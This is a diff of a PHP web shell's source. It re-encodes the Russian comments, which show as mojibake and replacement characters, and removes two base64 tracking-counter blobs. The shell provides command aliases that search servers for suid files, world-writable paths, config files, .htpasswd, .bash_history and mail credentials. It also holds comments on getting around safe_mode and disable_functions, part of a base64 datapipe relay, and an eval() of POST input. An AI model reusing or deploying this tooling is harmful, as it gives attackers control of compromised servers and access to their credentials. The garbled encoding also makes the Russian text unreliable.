-'ru_text75'=>'* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text76'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> find',
+'ru_text68'=>'Êîìàíäà',
+'ru_text69'=>'Ïàðàìåòð1',
+'ru_text70'=>'Ïàðàìåòð2',
+'ru_text71'=>"Âòîðîé ïàðàìåòð êîìàíäû:\r\n- äëÿ CHOWN - èìÿ íîâîãî ïîëüçîâàòåëÿ èëè åãî UID (÷èñëîì) \r\n- äëÿ êîìàíäû CHGRP - èìÿ ãðóïïû èëè GID (÷èñëîì) \r\n- äëÿ êîìàíäû CHMOD - öåëîå ÷èñëî â âîñüìåðè÷íîì ïðåäñòàâëåíèè (íàïðèìåð 0777)",
+'ru_text72'=>'Òåêñò äëÿ ïîèñêà',
+'ru_text73'=>'Èñêàòü â ïàïêå',
+'ru_text74'=>'Èñêàòü â ôàéëàõ',
+'ru_text75'=>'* ìîæíî èñïîëüçîâàòü ðåãóëÿðíîå âûðàæåíèå',
+'ru_text76'=>'Ïîèñê òåêñòà â ôàéëàõ ñ ïîìîùüþ óòèëèòû find',
 /* --------------------------------------------------------------- */
 'eng_text1' =>'Executed command',
 'eng_text2' =>'Execute command on server',
@@ -437,59 +437,59 @@ $lang=array(
 );
 
 /*
-<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD>-<2D><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. ( <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> )
-<EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
+Àëèàñû êîìàíä
+Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè )
+Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
 */
 
 $aliases=array(
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> suid <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> */
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */
 'find suid files'=>'find / -type f -perm -04000 -ls',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> suid <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> */
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */
 'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> sgid <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> */
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */
 'find sgid files'=>'find / -type f -perm -02000 -ls',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> sgid <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> */
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */
 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> config.inc.php */
+/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */
 'find config.inc.php files'=>'find / -type f -name config.inc.php',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> config.inc.php */
+/* ïîèñê â òåê äèðå config.inc.php */
 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> config* */
+/* ïîèñê íà ñåðâåðå ôàéëîâ config* */
 'find config* files'=>'find / -type f -name "config*"',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> config* */
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */
 'find config* files in current dir'=>'find . -type f -name "config*"',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> */
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
 'find all writable files'=>'find / -type f -perm -2 -ls',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> */
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
 'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> */
+/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
 'find all writable directories'=>'find /  -type d -perm -2 -ls',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> */
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> */
+/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
 'find all writable directories and files'=>'find / -perm -2 -ls',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> */
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
 'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> service.pwd ... frontpage =))) */
+/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */
 'find all service.pwd files'=>'find / -type f -name service.pwd',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> service.pwd */
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */
 'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .htpasswd */
+/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */
 'find all .htpasswd files'=>'find / -type f -name .htpasswd',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .htpasswd */
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */
 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .bash_history */
+/* ïîèñê âñåõ ôàéëîâ .bash_history */
 'find all .bash_history files'=>'find / -type f -name .bash_history',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .bash_history */
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */
 'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .fetchmailrc */
+/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */
 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .fetchmailrc */
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */
 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ext2fs */
+/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */
 'list file attributes on a Linux second extended file system'=>'lsattr -va',
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> */
+/* ïðîñìîòð îòêðûòûõ ïîðòîâ */
 'show opened ports'=>'netstat -an | grep -i listen',
 '----------------------------------------------------------------------------------------------------'=>'ls -la'
 );
@@ -499,7 +499,7 @@ $table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=
 $table_up2  = " ::</div></b></font></td></tr><tr><td>";
 $table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
 $table_end1 = "</td></tr>";
-$arrow      = " <font face=Wingdings color=gray><EFBFBD></font>";
+$arrow      = " <font face=Wingdings color=gray>è</font>";
 $lb         = "<font color=black>[</font>";
 $rb         = "<font color=black>]</font>";
 $font       = "<font face=Verdana size=-2>";
@@ -513,10 +513,10 @@ $windows = 0;
 $unix = 0;
 if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
 if(empty($dir))
- { // <EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+ { // íà ñëó÷àé åñëè íå óäàëîñü ïîëó÷èòü äèðåêòîðèþ
  $os = getenv('OS');
- if(empty($os)){ $os = php_uname(); } // <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> php_uname()
- if(empty($os)){ $os ="-"; $unix=1; } // <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> unix =)
+ if(empty($os)){ $os = php_uname(); } // ïðîáóåì ïîëó÷èòü ÷åðåç php_uname()
+ if(empty($os)){ $os ="-"; $unix=1; } // åñëè íè÷åãî íå ïîëó÷èëîñü òî áóäåò unix =)
  else
     {
     if(@eregi("^win",$os)) { $windows = 1; }
@@ -565,9 +565,9 @@ if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd'])
   die(); // show founded strings and die
   }
 
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> safe_mode. <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> */
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> cmd.exe <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>                */
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20> php.ini <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> disable_functions                                                            */
+/* Ïðîâåðêà òîãî ìîæåì ëè ìû âûïîëíÿòü êîìàíäû ïðè âûêëþ÷åííîì safe_mode. Åñëè íåò òî ñ÷èòàåì ÷òî ñåéô âêëþ÷åí */
+/* Îáõîäèò íåâîçìîæíîñòü âûïîëíåíèÿ êîìàíä íà âèíäå êîãäà ñåéô âûêëþ÷åí íî cmd.exe ïåðåèìåíîâàí                */
+/* ëèáî êîãäà â php.ini ïðîïèñàíû disable_functions                                                            */
 if($windows&&!$safe_mode)
  {
  $uname = ex("ver");
@@ -632,7 +632,7 @@ function ex($cfe)
 /* write error */
 function we($i)
 {
-if($GLOBALS['language']=="ru"){ $text = '<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>! <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD> '; }
+if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó çàïèñàòü â ôàéë '; }
 else { $text = "[-] ERROR! Can't write in file "; }
 echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
 }
@@ -640,7 +640,7 @@ echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><fon
 /* read error */
 function re($i)
 {
-if($GLOBALS['language']=="ru"){ $text = '<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>! <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> '; }
+if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó ïðî÷èòàòü ôàéë '; }
 else { $text = "[-] ERROR! Can't read file "; }
 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
 }
@@ -648,7 +648,7 @@ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgco
 /* create error */
 function ce($i)
 {
-if($GLOBALS['language']=="ru"){ $text = "<EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> "; }
+if($GLOBALS['language']=="ru"){ $text = "Íå óäàëîñü ñîçäàòü "; }
 else { $text = "Can't create "; }
 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
 }
@@ -1022,25 +1022,7 @@ DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSU
 ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
 /* --- END datapipe.pl ----------------------------------------------------------------------------------------- */
-$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
-JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
-lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
-FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
-3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
-J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
-oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
-xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
-i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
-dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
-ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
-hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
-$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
-IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
-hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
-tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
-XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
-8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
-ybmV0LS0+";
+
 /*** END base64 ------------------------------------------------------------------------------------------------ */
 
 //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
@@ -1468,7 +1450,7 @@ else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump"))
 
 }
 
-// <EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>
+// íå çàâèñèò îò ñåéôà
 if ($_POST['cmd']=="php_eval")
  {
  $eval = @str_replace("<?","",$_POST['php_eval']);
@@ -1476,7 +1458,7 @@ if ($_POST['cmd']=="php_eval")
  @eval($eval);
